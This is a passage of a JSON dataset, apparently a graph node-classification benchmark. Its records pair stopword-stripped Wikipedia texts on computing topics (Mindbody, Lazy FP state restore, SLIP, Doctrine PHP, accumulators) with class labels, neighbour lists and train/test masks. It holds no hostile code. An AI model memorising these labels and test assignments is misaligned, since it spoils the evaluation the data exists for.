    "label": 7,
    "text": "Knack_Online_Database_Tools:knack online database tools knack formerly appnowgo software service company offers tools building online databases web applications knack founded 2010 used startup incubator dreamit philadelphia knack 100 remote company knack customers often move using microsoft excel spreadsheets google docs",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 1022,
    "label": 4,
    "text": "Fish_DNA_barcoding:fish dna barcoding dna barcoding methods fish used identify groups fish based dna sequences within selected regions genome methods used study fish genetic material form environmental dna edna cells freely diffused water allows researchers identify species present body water collecting water sample extracting dna sample isolating dna sequences specific species interest barcoding methods also used biomonitoring food safety validation animal diet assessment assessment food webs species distribution detection invasive species fish research barcoding used alternative traditional sampling methods barcoding methods often provide information without damage studied animal aquatic environments unique properties affect genetic material organisms distributed dna material diffuses rapidly aquatic environments makes possible detect organisms large area sampling specific spot due rapid degradation dna aquatic environments detected species represent contemporary presence without confounding signals past dna-based identification fast reliable accurate characterization across life stages species reference libraries used connect barcode sequences single species used identify species present dna samples libraries reference sequences also useful identifying species cases morphological ambiguity larval stages edna samples barcoding methods used water management species composition used indicator ecosystem health barcoding metabarcoding methods particularly useful studying endangered elusive fish species detected without catching harming animals biomonitoring aquatic ecosystems required national international legislation e.g water framework directive marine strategy framework directive traditional methods time-consuming include destructive practices harm individuals rare protected species dna barcoding relatively cost-effective quick method identifying fish species aquatic environments presence absence key fish species established using edna water samples spatio-temporal distribution fish species e.g timing location spawning studied help discover e.g impacts physical barriers dam construction human disturbances dna tools also used dietary studies fish construction aquatic food webs metabarcoding fish gut contents feces identify recently consumed prey species however secondary predation must taken consideration early detection vital control removal non-indigenous ecologically harmful species e.g lion fish pterois sp atlantic caribbean metabarcoding edna used detect cryptic invasive species aquatic ecosystems barcoding metabarcoding approaches yield rigorous extensive data recruitment ecology geographic ranges fisheries resources methods also improve knowledge nursery areas spawning grounds benefits fisheries management traditional methods fishery assessment highly destructive gillnet sampling trawling molecular methods offers alternative non-invasive sampling example barcoding metabarcoding help identifying fish eggs species ensure reliable data stock assessment proven reliable identification via phenotypic characters barcoding metabarcoding also powerful tools monitoring fisheries quotas by-catch edna detect quantify abundance anadromous species well temporal distribution approach used develop appropriate management measures particular importance commercial fisheries globalisation food supply chains led increased uncertainty origin safety fish-based products barcoding used validate labelling products trace origin “ fish fraud ” discovered across globe recent study supermarkets state new york found 26.92 seafood purchases identifiable barcode mislabelled barcoding also trace fish species human health hazards related consumption fish biotoxins occasionally concentrated toxins move food chain one example relates coral reef species predatory fish barracuda detected cause ciguatera fish poisoning new associations fish poisoning detected use fish barcoding barcoding used conservation endangered species prevention illegal trading cites listed species large black market fish based products also aquarium pet trades protect sharks overexploitation illegal use detected barcoding shark fin soup traditional medicines aquatic environments special attributes need considered sampling fish edna metabarcoding seawater sampling particular interest assessment health marine ecosystems biodiversity although dispersion edna seawater large salinity negatively influences dna preservation water sample contain high amounts edna fish one week sampling free molecules intestinal lining skin cell debris main sources fish edna comparison marine environments ponds biological chemical properties alter edna detection small size ponds compared water bodies makes sensitive environmental conditions exposure uv light changes temperature ph factors affect amount edna moreover trees dense vegetation around ponds represent barrier prevents water aeration wind barriers also promote accumulation chemical substances damage edna integrity heterogeneous distribution edna ponds may affect detection fishes availability fish edna also dependent life stage activity seasonality behavior largest amounts edna obtained spawning larval stages breeding activity primer design crucial metabarcoding success studies primer development described cytochrome b 16s suitable target regions fish metabarcoding evans et.al 2016 described ac16s l2513/h2714 primer sets able detect fish species accurately different mesocosms another study performed valentini et.al 2016 showed l1848/h1913 primer pair amplifies region 12s rrna locus able reach high taxonomical coverage discrimination even short target fragment research also evidenced 89 sampling sites metabarcoding approach similar even higher traditional methods e.g electrofishing netting methods hänfling et.al 2016 performed metabarcoding experiments focused lake fish communities using 12s_f1/12s_r1 cytb_l14841/cytb_h15149 primer pairs whose targets located mitochondrial 12s cytochrome b regions respectively results demonstrate detection fish species higher using 12s primers cytb due persistence shorter 12s fragments ~100 bp comparison larger cytb amplicon ~460 bp general studies summarize special considerations primer design selection taken according objectives nature experiment number open access databases available researchers worldwide proper identification fish specimens dna barcoding methods relies heavily quality species coverage available sequence databases fish reference database electronic database typically contains dna barcodes images geospatial coordinates examined fish specimens database also contain linkages voucher specimens information species distributions nomenclature authoritative taxonomic information collateral natural history information literature citations reference databases may curated meaning entries subjected expert assessment included uncurated case may include large number reference sequences less reliable identification species fish-bol launched 2005 fish barcode life initiative fish-bol www.fishbol.org international research collaboration assembling standardized reference dna sequence library fish species concerted global research project goal collect assemble standardized dna barcode sequences associated voucher provenance data curated reference sequence library aid molecular identification fish species researchers wish contribute fish-bol reference library clear guidelines provided specimen collection imaging preservation archival well meta-data collection submission protocols fish-bol database functions portal barcode life data systems bold french polynesia fish barcoding base french polynesia fish barcoding database contains specimens captured several field trips organised participated criobe centre island research environmental observatory since 2006 archipelagos french polynesia classified specimen following information available scientific name picture date gps coordinate depth method capture size cytochrome oxidase c subunit 1 co1 dna sequence database searched using name genus species using part co1 dna sequence aquagene collaborative product developed several german institutions aquagene provides free access curated genetic information marine fish species database allows species identification dna sequence comparisons species characterized multiple gene sequences presently including standard co1 barcoding gene together cytb myh6 coming shortly rhod facilitating unambiguous species determination even closely related species high intraspecific diversity genetic data complemented online additional data sampled specimen digital images voucher number geographic origin additional resources reference databases general may also useful barcoding fish barcode life datasystem genbank barcoding/metabarcoding provides quick usually reliable species identification meaning morphological identification i.e taxonomic expertise needed metabarcoding also makes possible identify species organisms degraded part organism available powerful tool detection rare and/or invasive species detected despite low abundance traditional methods assess fish biodiversity abundance density include use gears like nets electrofishing equipment trawls cages fyke-nets gear show reliable results presence abundant species contrary rare native species well newly established alien species less likely detected via traditional methods leading incorrect absence/presence assumptions barcoding/metabarcoding also cases non-invasive sampling method provides opportunity analyze dna edna sampling living organisms fish parasites metabarcoding allows detection cryptic microscopic parasites aquatic environments difficult direct methods e.g identifying species samples microscopy parasites exhibit cryptic variation metabarcoding helpful method revealing application edna metabarcoding cost-effective large surveys many samples required edna reduce costs fishing transport samples time invested taxonomists cases requires small amounts dna target species reach reliable detection constantly decreasing prices barcoding/metabarcoding due technical development another advantage edna approach also suitable monitoring inaccessible environments results obtained metabarcoding limited biased frequency occurrence also problematic far species barcodes attached even though metabarcoding may overcome practical limitations conventional sampling methods still consensus regarding experimental design bioinformatic criteria application edna metabarcoding lack criteria due heterogeneity experiments studies conducted far dealt different fish diversities abundances types aquatic ecosystems numbers markers marker specificities another significant challenge method quantify fish abundance molecular data although cases quantification possible appears consensus extent molecular data meet aim fish monitoring detailed information dna barcoding different organisms found dna barcoding dna barcoding diet assessment algae dna barcoding microbial dna barcoding aquatic macroinvertebrate dna barcoding",
    "neighbors": [
      897,
      10102,
      902
    ],
    "mask": "None"
  },
  {
    "node_id": 1023,
    "label": 7,
    "text": "Mindbody_Inc.:mindbody inc. mindbody american software-as-a-service company headquartered san luis obispo california founded 2001 company provides cloud-based business management software wellness services industry mindbody serves 35 million consumers located 130 countries territories provides business management software online scheduling platforms 58,000 health wellness businesses globally company clients include bikram yoga new york health racquet club classpass one mindbody technology partners using mindbody api manage inventory classpass app mindbody originally known hardbody software latter co-founded blake beltram rick stollmeyer robert murphy 2000 company later incorporated mindbody 2001 2005 mindbody online launched later received first private funding round us 1 million november 2005 tech coast angels pasadena angels company first round institutional investment came april 2009 sum us 5.6 million catalyst investors company received investment august 2010 sum us 14 million bessemer venture partners catalyst investors initial portion us 11 million remaining us 3 million exercised time within 36 months received another round funding november 2012 us 35 million bessemer venture partners institutional venture partners catalyst investors february 2014 mindbody received final round private funding amount us 50 million bessemer venture partners institutional venture partners catalyst investors w capital partners montreux equity partners february 2015 mindbody acquired company fitness mobile apps undisclosed amount time acquisition company creating customizable applications ios android platforms mindbody went public june 2015 raising us 100 million capital october 2015 mindbody integrated mindbody connect app fitbit making possible app users connect fitbit activity trackers view personal activity data achieved workouts scheduled mindbody businesses september 2016 mindbody acquired healcode technology company designed web tools fitness wellness industry october 2016 mindbody integrated armour ’ myfitnesspal app make possible app users find book fitness classes throughout united states directly myfitnesspal december 24 2018 mindbody announced going acquired vista equity partners us 1.9 billion february 18 2019 vista equity partners completed acquisition company",
    "neighbors": [
      467,
      685
    ],
    "mask": "None"
  },
  {
    "node_id": 1024,
    "label": 4,
    "text": "Lazy_FP_state_restore:lazy fp state restore lazy fpu state leak also referred lazy fp state restore lazyfp security vulnerability affecting intel core cpus vulnerability caused combination flaws speculative execution technology present within affected cpus certain operating systems handle context switching floating point unit fpu exploiting vulnerability local process leak content fpu registers belong another process vulnerability related spectre meltdown vulnerabilities publicly disclosed january 2018 announced intel 13 june 2018 discovered employees amazon cyberus technology sysgo besides used floating point arithmetic fpu registers also used purposes including storing cryptographic data using aes instruction set present many intel cpus means vulnerability may allow key material compromised floating point simd registers large used every task thread system make context switching faster common microprocessors support lazy state switching rather storing full state context switch operating system simply mark fpu available hopes switched-to task need operating system guessed correctly time saved guess wrong first fpu simd instruction cause trap operating system save state previous task load correct state current task out-of-order cpus fpu available condition detected immediately fact almost detected immediately may multiple fault-causing instructions executing simultaneously processor must take first fault encountered preserve illusion in-order execution information first available in-order retire stage processor speculatively executes instruction using previous task register contents following instructions later detects fpu available condition although architectural state reverted beginning faulting instruction possible use part fpu state address memory load triggering load processor cache exploitation follows pattern spectre-family vulnerabilities cache state architectural state cache affect speed correctness cache load undone address including part previous task register state later detected measuring time taken access different memory addresses possible exploit bug without actually triggering operating system traps placing fpu access shadow forced branch misprediction e.g using retpoline processor still speculatively execute code rewind mispredicted branch never actually execute operating system trap allows attack rapidly repeated quickly reading entire fpu simd register state possible mitigate vulnerability operating system hypervisor levels always restoring fpu state switching process contexts fix firmware upgrade required operating systems already lazily restore fpu registers default protecting operating systems affected hardware platforms even underlying hardware issue existed linux operating system using kernel 3.7 higher possible force kernel eagerly restore fpu registers using codice_1 kernel parameter also many system software vendors projects including linux distributions openbsd xen released patches address vulnerability",
    "neighbors": [
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      8815,
      1140,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      2709,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      6926,
      10003,
      4389,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9541,
      4423,
      6484,
      857,
      1882,
      7515,
      3956,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      1461,
      441,
      1979,
      4027,
      9664,
      8133,
      7639,
      8664,
      1504,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1025,
    "label": 2,
    "text": "Resident_set_size:resident set size computing resident set size rss portion memory occupied process held main memory ram rest occupied memory exists swap space file system either parts occupied memory paged parts executable never loaded",
    "neighbors": [
      9762,
      4423,
      6543,
      5840,
      7983,
      11539,
      9300,
      86,
      6616
    ],
    "mask": "Test"
  },
  {
    "node_id": 1026,
    "label": 2,
    "text": "Olivier_Fourdan:olivier fourdan olivier fourdan creator xfce desktop environment development began end 1996 started career new technologies production engineer well web development embedded linux systems fourdan working red hat since 2007 interrupted 2 years intel 2013 2014 2017 active adoption wayland working many different components amongst gtk+ mutter gnome control center xwayland mesa",
    "neighbors": [
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      9455,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 1027,
    "label": 0,
    "text": "Marti_Hearst:marti hearst marti hearst professor school information university california berkeley early work corpus-based computational linguistics including first work automating sentiment analysis word sense disambiguation invented algorithm became known hearst patterns applies lexico-syntactic patterns recognize hyponymy isa relations high accuracy large text collections including early application wordnet algorithm widely used commercial text mining applications including ontology learning hearst also developed early work automatic segmentation text topical discourse boundaries inventing well-known approach called texttiling hearst research user interfaces search engine technology big data analytics early work user interfaces information visualization search user interfaces inventing tilebars query term visualization flamenco research project investigated developed widely used faceted navigation approach searching browsing web sites information collections wrote first academic book topic search user interfaces cambridge university press 2009 hearst edge foundation contributing author member usage panel american heritage dictionary english language hearst received b.a. m.s. ph.d. computer science u.c berkeley 2013 became fellow association computing machinery",
    "neighbors": [
      8440,
      538,
      7724
    ],
    "mask": "Test"
  },
  {
    "node_id": 1028,
    "label": 2,
    "text": "Brian_Fox_(computer_programmer):brian fox computer programmer brian j fox born 1959 american computer programmer entrepreneur consultant author free software advocate original author gnu bash shell announced beta june 1989 continued primary maintainer bash least early 1993 fox also built first interactive online banking software u.s. wells fargo 1995 created open source election system 2008 1985 fox worked richard stallman stallman newly created free software foundation fsf fox authored gnu bash gnu makeinfo gnu info gnu finger gnu echo readline history libraries also maintainer gnu emacs time made many contributions software created gnu project 1986 1994 2008 fox collaborated alan dechert brent turner create completely open source election system system coded together parker abercrombie demonstrated linuxworld conference moscone center san francisco august 5–7 2008 fox also founding member california association voting officials cavo national association voting officials navo not-for-profit organizations promote open source voting systems use public elections fox co-wrote new york times piece 2017 former cia head r. james woolsey advocating open source election systems means securing us elections russian interference fox also wrote amacs cut-down implementation emacs apple ii series fourth born family 6 siblings composer musician donal fox thaddeus fox sister ena fox daniel fox sister sara fox-ray lives santa barbara longtime partner lissa liggett three children son physicist educator herbert fox grandson artist daniel fox creator monopoly man",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      3350,
      802,
      3618,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      8147,
      3674,
      2010,
      10464,
      10727,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "Test"
  },
  {
    "node_id": 1029,
    "label": 3,
    "text": "Accumulator_(computing):accumulator computing computer central processing unit cpu accumulator register intermediate arithmetic logic results stored without register like accumulator would necessary write result calculation addition multiplication shift etc main memory perhaps read right back use next operation access main memory slower access register like accumulator technology used large main memory slower cheaper used register early electronic computer systems often split two groups accumulators without modern computer systems often multiple general purpose registers operate accumulators term longer common however number special-purpose processors still use single accumulator work simplify design mathematical operations often take place stepwise fashion using results one operation input next instance manual calculation worker weekly payroll might look something like computer program carrying task would follow basic sequence operations although values looked would stored computer memory early computers number hours would likely held punch card pay rate form memory perhaps magnetic drum multiplication complete result needs placed somewhere drum machine would likely back drum operation takes considerable time next operation read value back introduces another considerable delay accumulators dramatically improve performance systems like providing scratchpad area results one operation fed next one little performance penalty example basic weekly pay would calculated placed accumulator could immediately used income tax calculation removes one save one read operation sequence operations generally took tens hundreds times long multiplication accumulator machine also called 1-operand machine cpu accumulator-based architecture kind cpu although may several registers cpu mostly stores results calculations one special register typically called accumulator almost early computers accumulator machines high-performance supercomputers multiple registers mainframe systems gave way microcomputers accumulator architectures popular mos 6502 notable example many 8-bit microcontrollers still popular 2014 picmicro 8051 accumulator-based machines modern cpus typically 2-operand 3-operand machines additional operands specify one many general purpose registers also called general purpose accumulators used source destination calculations cpus considered accumulator machines characteristic distinguishes one register accumulator computer architecture accumulator architecture one would used implicit operand arithmetic instructions instance cpu might instruction like codice_1 adds value read memory location memaddress value accumulator placing result back accumulator accumulator identified instruction register number implicit instruction register specified instruction architectures use particular register accumulator instructions instructions use register numbers explicit operand specification system uses single memory store result multiple operations considered accumulator j. presper eckert refers even earliest adding machines gottfried leibniz blaise pascal accumulator-based systems percy ludgate first conceive multiplier-accumulator mac analytical machine 1909 historical convention dedicates register accumulator arithmetic organ literally accumulates number sequence arithmetic operations instructions example modern interpretation convention exists regarding names operations registers accumulator accumulator registers tradition e.g donald knuth 1973 hypothetical mix computer example uses two instructions called load accumulator register/memory e.g lda r store accumulator register/memory e.g sta r knuth model many instructions well 1945 configuration eniac 20 accumulators could operate parallel one could store eight decimal digit number add subtract number received ibm early binary scientific computers beginning vacuum tube ibm 701 1952 used single 36-bit accumulator along separate multiplier/quotient register handle operations longer results ibm 650 decimal machine one 10 digit accumulator ibm 7070 later transistorized decimal machine three accumulators 12-bit pdp-8 one first minicomputers use accumulators inspired many later machines pdp-8 one accumulator hp 2100 data general nova 2 4 accumulators nova created follow-on pdp-8 rejected favor would become pdp-11 nova provided four accumulators ac0-ac3 although ac2 ac3 could also used provide offset addresses tending towards generality usage registers pdp-11 introduced contemporary model general registers numbered r0-r7 adopted later cisc risc machines early 4-bit 8-bit microprocessors 4004 8008 numerous others typically single accumulators 8051 microcontroller two primary accumulator secondary accumulator second used instructions multiplying mul ab dividing div ab former splits 16-bit result two 8-bit accumulators whereas latter stores quotient primary accumulator remainder secondary accumulator b direct descendent 8008 8080 8086 modern ubiquitous intel x86 processors still uses primary accumulator eax secondary accumulator edx multiplication division large numbers instance mul ecx multiply 32-bit registers ecx eax split 64-bit result eax edx however mul div special cases arithmetic-logical instructions add sub cmp xor test may specify eight registers eax ecx edx ebx esp ebp esi edi accumulator i.e left operand destination also supported multiply upper half result required x86 thus fairly general register architecture despite based accumulator model 64-bit extension x86 x86-64 generalized 16 instead 8 general registers",
    "neighbors": [
      3459,
      5384,
      7445,
      8732,
      4385,
      9891,
      5412,
      6821,
      11059,
      1462,
      9911,
      8761,
      3010,
      6596,
      1480,
      9932,
      8143,
      3157,
      1502,
      1376,
      6499,
      5862,
      3050,
      5356,
      2798,
      5358,
      1776,
      4465,
      5617,
      499,
      4596,
      7281,
      7421,
      9599
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1030,
    "label": 5,
    "text": "Serial_Line_Internet_Protocol:serial line internet protocol serial line internet protocol also slip encapsulation internet protocol designed work serial ports router connections documented personal computers slip largely replaced point-to-point protocol ppp better engineered features require ip address configuration set established microcontrollers however slip still preferred way encapsulating ip packets due small overhead people refer successful widely used serial line internet protocol rick adams slip avoid confusion proposed protocols named slip protocols include much complicated appendix serial line interface protocol slip modifies standard tcp/ip datagram slip requires serial port configuration 8 data bits parity either eia hardware flow control clocal mode 3-wire null-modem uart operation settings slip provide error detection reliant upper layer protocols therefore slip satisfactory error-prone dial-up connection however still useful testing operating systems response capabilities load looking flood-ping statistics slip escape characters also required modem connections escape hayes command set allowing therefore pass binary data modems would recognize characters commands version slip header compression called compressed slip cslip compression algorithm used cslip known van jacobson tcp/ip header compression cslip effect data payload packet independent compression serial line modem used transmission reduces transmission control protocol tcp header twenty bytes seven bytes cslip effect user datagram protocol udp datagrams",
    "neighbors": [
      10242,
      9860,
      3847,
      6152,
      649,
      9992,
      9868,
      1297,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      2206,
      10271,
      9506,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      9779,
      2996,
      9909,
      4918,
      7865,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      6082,
      7364,
      11332,
      2887,
      8265,
      11468,
      2509,
      8654,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      1893,
      10341,
      10344,
      5225,
      11112,
      367,
      8432,
      5875,
      8692,
      6651,
      636,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 1031,
    "label": 2,
    "text": "Cray_Operating_System:cray operating system cray operating system cos succeeded chippewa operating system shipped earlier computer systems cdc 6000 series cdc 7600 cray research discontinued proprietary operating system cray-1 1976 cray x-mp supercomputers platforms main os replaced unicos late 1980s cos delivered cray assembly language cal cray fortran cft pascal cos written ex-control data employees command language internal organization bore strong resemblance scope operating system cdc 7600 exec*8 cdc earlier era/univac pedigree user jobs submitted cos via front-end computers via high-speed channel interface so-called station software front end stations typically large ibm control data mainframes however dec vax also popular front-end interactive use cos possible stations users simply submitted batch jobs disk-resident datasets used user program 'local individual job job completed local datasets would released space reclaimed order retain data jobs datasets explicitly made 'permanent magnetic tape datasets also supported cray systems equipped i/o subsystem cos also provided job scheduling checkpoint/restart facilities manage large workloads even across system downtimes scheduled unscheduled internally cos divided small message-passing exec number system task processors stp tasks stp task similar nature peripheral processor programs earlier control data operating systems however since cray machines peripheral processors main central processor executed operating system code source version 1.13 released public domain 1.17 available archive.org",
    "neighbors": [
      9991,
      1480,
      7497,
      8524,
      7983,
      6675,
      3323,
      11517
    ],
    "mask": "None"
  },
  {
    "node_id": 1032,
    "label": 2,
    "text": "Instant-on:instant-on computers instant-on ability boot nearly instantly thus allowing go online use specific application without waiting pc traditional operating system launch instant-on technology today mostly used laptops netbooks nettops user boot one program instead waiting pc entire operating system boot instance user may want launch movie-playing program launch internet browser without needing whole operating system true instant-on machines atari st described booting article machines complete operating systems resident rom similar way bios function conventionally provided current computer architectures instant-on concept used results loading os legacy system dos small hard drive footprint latency inherent mechanical drive performance also eliminated using live usb live sd flash memory load systems electronic speeds orders magnitude faster instant-on operating system like used 1980s home computers commodore 64 offers many advantages standard modern operating system however comes price limited local functionality focusing web cloud services past consumer electronics manufacturers would emblazon radios television sets instant instant play decals series filament sets instant-on accomplished adding silicon diode across power switch keep tube filaments lit 50 power diode placed typical half wave rectifier day reverse-biased instant-on advantages included near-instant operation television radio potentially longer vacuum tube life disadvantages included energy consumption risk fire solid state consumer electronics inherently instant-on moniker survived early solid state era differentiate product vacuum-tube based brethren crts notable exception",
    "neighbors": [
      2658,
      5384,
      1515,
      8044,
      3886,
      7983,
      4432,
      5681,
      7515,
      10192,
      823,
      1400,
      5721,
      2811,
      4637
    ],
    "mask": "Test"
  },
  {
    "node_id": 1033,
    "label": 8,
    "text": "Angelfish_software:angelfish software angelfish software on-premises self-hosted web analytics application allows organizations monitor users interact websites web-based applications angelfish use web server logs javascript page tags create reports first released 2013 angelfish software created response google cancellation urchin lack options existed on-premises web analytics software angelfish popular solution tracking intranet sharepoint environments significant interest organizations required protect website visitor data due regulations use google analytics due data privacy concerns",
    "neighbors": [
      4096,
      6797,
      823,
      7983,
      6576,
      1943
    ],
    "mask": "Test"
  },
  {
    "node_id": 1034,
    "label": 1,
    "text": "Doctrine_(PHP):doctrine php doctrine project doctrine set php libraries primarily focused providing persistence services related functionality prize projects object-relational mapper orm database abstraction layer built top one doctrine key features option write database queries doctrine query language dql object-oriented dialect sql entities doctrine 2 lightweight php objects contain persistable properties persistable property instance variable entity saved retrieved database doctrine ’ data mapping capabilities via entity manager implementation data mapper pattern doctrine 1.x follows active record pattern working data class corresponds database table instance programmer wanted create new user object database would longer need write sql queries instead could use following php code one feature doctrine low level configuration needed start project doctrine generate object classes existing database programmer specify relations add custom functionality generated classes need generate maintain complex xml database schemas seen many frameworks another key feature doctrine ability optionally write database queries oo object oriented sql dialect called dql doctrine query language inspired hibernate hql alternately querybuilder class doctrine_query doctrine 1.x allows one construct queries fluent interface interfaces provide developers powerful alternatives sql maintain flexibility still allow switching database back-ends without requiring code duplication writing queries explicitly however always necessary doctrine performs joins fetches related objects automatically small projects easily constructed without writing queries notable features doctrine doctrine started konsta vesterinen also known zyne- project initial commit made april 13 2006 project became mature adoption began pick long community active development receiving regular contributions among others google summer code project doctrine 1.0.0 released september 1 2008 first stable version doctrine 2.0 released december 22 2010 2.5 years dedicated development starting early 2008 doctrine influenced dozens projects many different people largest influences java orm hibernate activerecord ruby rails orm solutions implemented fully featured solution java ruby languages purpose doctrine project build equally powerful solution php language high-load websites maintain constant flow visitors doctrine orm used improve performance websites",
    "neighbors": [
      3080,
      9481,
      6154,
      9614,
      9245,
      2465,
      5537,
      7074,
      10919,
      5546,
      2348,
      5677,
      10413,
      7983,
      3763,
      190,
      10048,
      8644,
      11259,
      4171,
      6860,
      10587,
      11357,
      479,
      3553,
      7785,
      7147,
      5612,
      10737,
      4853,
      9467,
      2556,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 1035,
    "label": 1,
    "text": "Connection_pool:connection pool software engineering connection pool cache database connections maintained connections reused future requests database required connection pools used enhance performance executing commands database opening maintaining database connection user especially requests made dynamic database-driven website application costly wastes resources connection pooling connection created placed pool used new connection established connections used new connection made added pool connection pooling also cuts amount time user must wait establish connection database web-based enterprise applications use application server handle connection pooling dynamic web pages without connection pooling open connections database services required close page done servicing particular request pages use connection pooling hand maintain open connections pool page requires access database simply uses existing connection pool establishes new connection pooled connections available reduces overhead associated connecting database service individual requests local applications need frequent access databases also benefit connection pooling open connections maintained local applications n't need service separate remote requests like application servers implementations connection pooling become complicated number available libraries implement connection pooling related sql query pooling simplifying implementation connection pools database-intensive applications administrators configure connection pools restrictions numbers minimum connections maximum connections idle connections optimize performance pooling specific problem contexts specific environments.. connection pooling supported ibm db2 microsoft sql server oracle mysql postgresql neo4j",
    "neighbors": [
      9988,
      10340,
      72,
      7022,
      2804,
      853,
      11030,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 1036,
    "label": 5,
    "text": "Jingle_(protocol):jingle protocol jingle extension extensible messaging presence protocol xmpp adds peer-to-peer p2p session control signaling multimedia interactions voice ip voip videoconferencing communications designed google xmpp standards foundation multimedia streams delivered using real-time transport protocol rtp needed nat traversal assisted using interactive connectivity establishment ice proposed jingle specification yet approved xmpp standards foundation draft standard meaning implementations encouraged protocol appropriate deployment production systems changes protocol possible becomes final standard libjingle library used google talk implement jingle released public bsd license implements current standard protocol older pre-standard version though instant messaging client remotevnc uses jingle one screen sharing means",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      4746,
      11408,
      3610,
      3228,
      10271,
      3105,
      9381,
      9511,
      1962,
      5677,
      9519,
      8758,
      1467,
      6208,
      8640,
      1218,
      6982,
      6855,
      2760,
      1738,
      2892,
      3792,
      3284,
      4318,
      3812,
      4068,
      6628,
      9572,
      9320,
      7407,
      3959,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 1037,
    "label": 1,
    "text": "Toad_(software):toad software toad database management toolset quest software database developers database administrators data analysts use manage relational non-relational databases using sql toad products developers dbas run oracle sql server ibm db2 luw z/os sap mysql well toad product data preparation supports data platforms toad solutions enable data professionals automate processes minimize risks cut project delivery timelines jim mcdaniel aka toadman practicing oracle dba originally designed toad use mid-1990s called tool oracle application developers toad short mcdaniel made tool available others first shareware later freeware distributing freely internet user base grew effort maintenance development finally mcdaniel realized could longer dedicate substantial amounts time growing quantity software enhancement requests quest software established 1987 acquired toad october 1998 quest software acquired dell 2012 form dell software june 2016 dell announced sale software division including quest business francisco partners elliott management corporation october 31 2016 sale finalized november 1 2016 sale dell software francisco partners elliott management completed company re-launched quest software toad products currently part quest software portfolio",
    "neighbors": [
      6850,
      10340,
      1560,
      10413,
      270,
      3951,
      9112,
      4630,
      10518,
      1400,
      9177,
      5051,
      4255
    ],
    "mask": "None"
  },
  {
    "node_id": 1038,
    "label": 2,
    "text": "Virtual_CD-ROM_switching_utility:virtual cd-rom switching utility virtual cd-rom switching utilities programs disable virtual cd-rom drive found many devices virtual cd-rom switching utility mode switching tool controlling flip flop multiple device usb gear several new usb devices especially high-speed wireless wan equipment seems chipset qualcomm offering feature microsoft windows device drivers board plugged first time act like usb flash drive start installing device driver every consecutive plugging device driver switches mode internally storage device vanishes cases new device like usb modem shows wireless wan wwan gear maker option calls feature zerocd tm usb sniffing programs libusb possible eavesdrop communication ms windows device driver isolate command action switching reproduce thing rule linux bsd variants problem usb 3g modems two modes one mode usb flash drive mode modem typically ship windows device drivers sometimes mac device drivers well case seemingly seldom ever ship linux device drivers normally happens windows device starts usb flash drive hardware drivers installed responsible switching device modem mode use switch done via codes specific device controlling software pass command switch disk modem mode virtual cd-rom switching utility manages switch mode disk modem latter disconnects mounted disk containing software n't care wo n't work anyway crucially creates modem port/serial device usually /dev/ttyusb0 networkmanager approach adding virtual cd-rom software drivers 3g storage devices two problems presumably raises cost device may ship outdated software even viruses times up-to-date drivers anyway built operating systems systems implementing usb standard like gnu/linux 3g device usb serial port storage device ... usb storage device virtual cd-rom u3-compatible devices removed u3-tool utility 3g devices huawei support complete disabling virtual cd-rom device uses zerocd method means behaves usb cd-rom first connected virtual cd-rom inserted windows device drivers related cosmote control program windows device drivers installed special usb command sent device “ switch ” modem mode ozerocdoff temporarily disables zerocd usb option wwan modem new usb option wwan modem devices support cd-rom device holds needed windows device driver use wwan modem therefore firmware wwan modem announces usb enumeration process work virtual cd-rom device vendor name zoption device called zero-cd ozerocdoff solution switch zero-cd allow modem used modem usb_modeswitch virtual cd-rom switching utility version 1.0.3 upwards simple framework integrating switching udev device manager make fully automatic switch2modem designed switching 3g usb modem program works opensolaris huaweiaktbbo.c utility compiled re-creates usb communication used windows",
    "neighbors": [
      1952,
      1121,
      11363,
      9863,
      6797,
      8115,
      2525
    ],
    "mask": "Train"
  },
  {
    "node_id": 1039,
    "label": 9,
    "text": "AIMMS:aimms aimms acronym advanced interactive multidimensional modeling system prescriptive analytics software company offices netherlands united states china singapore two main product offerings provide modeling optimization capabilities across variety industries aimms prescriptive analytics platform allows advanced users develop optimization-based applications deploy business users aimms sc navigator launched 2017 built aimms prescriptive analytics platform provides configurable apps supply chain teams sc navigator provides supply chain analytics non-advanced users aimms b.v. founded 1989 mathematician johannes bisschop name paragon decision technology vision make optimization approachable building models rather programming bisschop ’ view modeling able build bridge people problems people helping solve problems aimms began software system designed modeling solving large-scale optimization scheduling-type problems aimms considered one five important algebraic modeling languages bisschop awarded informs impact prize work language 2003 aimms acquired small private equity firm led creation partnership program technical investment evolution platform 2011 company launched aimms pro way deploy applications end-users technical background quickly followed ability publish customize applications using browser decision support applications available device company grew 2017 recognized top b2b technology netherlands named one fastest growing companies netherlands second consecutive year along growing interest embedded advanced analytics supply chain management aimss developed aimms sc navigator platform allow supply chain analytics launched 